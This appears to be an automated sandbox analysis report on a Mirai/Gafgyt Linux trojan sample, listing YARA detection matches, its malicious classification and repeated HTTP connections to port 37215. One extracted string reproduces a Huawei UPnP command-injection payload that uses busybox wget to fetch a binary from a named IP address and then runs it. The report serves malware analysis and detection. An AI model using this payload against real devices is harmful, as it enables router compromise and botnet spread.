          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: classification engineClassification label: mal100.troj.linELF@0/0@25/0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 59658 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38366 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44360 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52870 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38188 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53450 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57304 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39548 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42194 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33370 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39518 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42236 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53344 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56676 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44256 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35002 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50762 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48634 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53894 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37630 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54208 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38364 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60136 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55640 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45572 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40734 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36064 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57838 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58934 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42506 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43724 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41050 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35862 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38640 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60542 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33892 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51316 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48328 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38532 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42680 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34020 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54930 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47314 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45398 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43246 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33562 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35912 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45482 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41958 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34878 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58618 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52378 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46944 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36492 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42166 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44954 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41560 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58626 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38814 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59774 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33108 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58030 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54846 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43364 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53530 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44924 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59426 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33256 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38664 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44534 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60458 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47758 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46794 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33752 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58368 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42722 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56236 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39432 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51224 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40174 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33492 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44030 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33430 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57836 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40592 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36116 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37580 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46742 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58910 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52558 -> 37215
